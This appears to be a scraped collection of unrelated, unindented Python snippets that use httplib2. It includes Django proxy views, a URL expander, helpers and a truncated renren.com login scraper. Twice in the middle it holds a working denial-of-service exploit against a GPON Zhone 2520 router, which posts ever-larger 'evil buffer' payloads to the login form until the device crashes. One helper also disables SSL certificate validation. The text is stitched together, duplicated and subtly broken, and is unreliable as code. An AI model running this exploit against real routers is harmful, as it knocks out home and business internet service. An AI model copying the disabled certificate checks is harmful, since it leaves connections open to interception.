def proxy(request):
"""Pass an HTTP request on to another server."""
# TODO: don't hardcode http
uri = "http://" + HOST + request.META['PATH_INFO']
if request.META['QUERY_STRING']:
uri += '?' + request.META['QUERY_STRING']
headers = {}
for name, val in six.iteritems(request.environ):
if name.startswith('HTTP_'):
name = header_name(name)
headers[name] = val
# TODO: try/except
http = Http()
http.follow_redirects = False
logger.debug("GET for: %s" % uri)
info, content = http.request(uri, 'GET', headers=headers)
response = HttpResponse(content, status=info.pop('status'))
for name, val in info.items():
if not is_hop_by_hop(name):
response[name] = val
logger.info("PROXY to: %s" % uri)
return response
def can_read(self, user):
#make a http request to url as user.
cookie = make_cookie(user.username)
headers = dict(Cookie = "%s=%s" % cookie)
http = Http() #fixme: globalize this so I can use keepalive
http.follow_redirects = True
response, content = http.request(self.url, headers=headers)
return response.status == 200
def ShortToFull(self):
request = Http() # create http object
request.follow_redirects = False
response, contents = request.request(self.shorturl) #shorturl request and get fullurl from response
try:
if response.status == 404: # status 404 is link break
self.fullurl = "N/A"
self.fullurl = response['location']
except KeyError as err:
return 0
return 1
def get_http():
'''
Get an http object
This is just an instance of the httplib2.Http class, properly
customized, extended and configured.
Note in most cases, handlers and other code should use the
get_http method of a MobileSite instance, rather than using this
function directly, in case the desktop source of a particular
mobile site needs further customization.
@return : http object
@rtype : httplib2.Http
'''
from httplib2 import Http
http = Http()
http.follow_redirects = False
http.force_exception_to_status_code = True
return http
def proxy(request):
# TODO: don't hardcode http
uri = "http://" + HOST + request.META['PATH_INFO']
if request.META['QUERY_STRING']:
uri += '?' + request.META['QUERY_STRING']
headers = {}
for name, val in request.environ.iteritems():
if name.startswith('HTTP_'):
name = header_name(name)
headers[name] = val
# TODO: try/except
http = Http()
http.follow_redirects = False
info, content = http.request(uri, 'GET', headers=headers)
response = HttpResponse(content, status=info.pop('status'))
for name, val in info.items():
if not is_hop_by_hop(name):
response[name] = val
return response
def http(self):
http = Http(cache=self.cache, timeout=5, disable_ssl_certificate_validation=True)
http.follow_redirects = self.chase_redirect
return http
print ' GPON Zhone 2520'
print ' Hardware: 0040-48-02'
print ' Software: R4.0.2.566b'
print ' '
print ' Usage : python', sys.argv[0] + ' <ip>'
print ' Ex : python',sys.argv[0] + ' 192.168.15.1'
print ' Author : Kaczinski [email protected] '
print ' URL : http://www.websec.mx/advisories'
print '*********************************************************************************'
sys.exit()
HOST = sys.argv[1]
LIMIT = 100000
COUNT = 1
SIZE = 10
BUFFER = ''
while len(BUFFER) < LIMIT:
BUFFER = '\x41' * COUNT
print "[+] Sending evil buffer with length:", len(BUFFER)
h = Http()
h.follow_redirects = True
data = dict(XWebPageName=buffer, oldpassword=BUFFER, password="", password2="test", passwdtip="test")
try:
resp, content = h.request("http://" + HOST + "/GponForm/LoginForm", "POST", urlencode(data))
except:
print "[+] GPON should be down, is not responding..."
sys.exit()
COUNT = COUNT * SIZE
print "[-] GPON not vulnerable"
print ' Hardware: 0040-48-02'
print ' Software: R4.0.2.566b'
print ' '
print ' Usage : python', sys.argv[0] + ' <ip>'
print ' Ex : python',sys.argv[0] + ' 192.168.15.1'
print ' Author : Kaczinski [email protected] '
print ' URL : http://www.websec.mx/advisories'
print '*********************************************************************************'
sys.exit()
HOST = sys.argv[1]
LIMIT = 100000
COUNT = 1
SIZE = 10
BUFFER = ''
while len(BUFFER) < LIMIT:
BUFFER = '\x41' * COUNT
print "[+] Sending evil buffer with length:", len(BUFFER)
h = Http()
h.follow_redirects = True
data = dict(XWebPageName=buffer, oldpassword=BUFFER, password="", password2="test", passwdtip="test")
try:
resp, content = h.request("http://" + HOST + "/GponForm/LoginForm", "POST", urlencode(data))
except:
print "[+] GPON should be down, is not responding..."
sys.exit()
COUNT = COUNT * SIZE
print "[-] GPON not vulnerable"
def http_request(url, method, data=None, headers=None):
h = Http()
h.follow_redirects = False
return h.request(url, method, data, headers)
def http_request(url, method, data=None, headers=None):
h = Http()
h.follow_redirects = False
return h.request(url, method, data, headers)
# -*- Encoding: utf-8 -*-
import urllib
from httplib2 import Http
LOGIN_URL = 'http://www.renren.com/PLogin.do'
FRIENDS_URL = 'http://friend.renren.com/myfriendlistx.do'
h = Http()
h.follow_redirects = False
login_data = {
'email': '*****@*****.**',
'password': '******',
'origURL': 'http://www.renren.com/home',
'domain': 'renren.com',
}
headers_template = {
'Accept':
'application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5',
'Accept-Charset':
'UTF-8,*;q=0.5',
'Accept-Encoding':
'gzip,deflate,sdch',
'Accept-Language':
'zh-CN,zh;q=0.8',
'Cache-Control':
'max-age=0',
'Connection':
'keep-alive',
'Host':
